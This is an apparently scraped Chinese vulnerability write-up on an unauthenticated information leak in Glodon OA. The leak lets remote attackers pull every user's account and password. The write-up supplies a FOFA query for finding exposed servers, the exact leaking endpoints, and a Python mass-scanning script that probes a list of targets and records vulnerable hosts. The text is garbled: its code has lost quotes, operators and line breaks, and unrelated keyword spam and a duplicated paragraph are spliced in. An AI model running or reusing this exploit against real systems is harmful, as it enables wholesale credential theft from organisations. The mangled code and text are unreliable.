wps免费模板网站,山西省建设工程信息网站,重庆五号线金建站,电子商务网站建设自服务器漏洞描述
广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑#xff0c;提供一百余款基于“端云大数据”产品/服务#xff0c;提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞#xff0c;由于某些接口没有鉴权#xff0c…漏洞描述
广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑提供一百余款基于“端云大数据”产品/服务提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞由于某些接口没有鉴权导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。 漏洞复现
FOFA
appGlodon-企业管理产品
POC
IP/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS 查看账户密码 python脚本
import argparse
import time
import requests
from urllib.parse import urlsplit
import warnings
from urllib3.exceptions import InsecureRequestWarning color_red \033[91m
color_green \033[92m
color_blue \033[94m
color_reset \033[0m def get_url(file): with open(file, r, encodingutf-8) as f: for url in f: url url.replace(\n, ) if http not in url: url http:// url parsed_url urlsplit(url) base_url parsed_url.scheme :// parsed_url.netloc send_req(base_url) def write_result(content): with open(result.txt, a, encodingUTF-8) as f: f.write({}\n.format(content)) warnings.filterwarnings(ignore, categoryInsecureRequestWarning) def send_req(url_check): url url_check /Org/service/Service.asmx/GetAllUsersXml header { User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36, Connection: close } try: response requests.get(urlurl, headersheader, verifyFalse, timeout3) if response.status_code 200 and ?xml in response.text and UserId in response.text and SUserId in response.text and Code in response.text: response requests.get(urlurl_check /Org/service/Service.asmx/GetUserXml4GEPS, headersheader, verifyFalse, timeout3) if response.status_code 200: result2 f{url_check}/Org/service/Service.asmx/GetUserXml4GEPS print(color_red result2 color_reset) # Added color_reset to avoid colored text issues write_result(result2) time.sleep(1) except Exception as e: pass if __name__ __main__: parser argparse.ArgumentParser() parser.add_argument(-f, --file, helpURL地址文件) args parser.parse_args() if args.file: get_url(args.file) else: print(使用-f加url文件地址)
执行效果
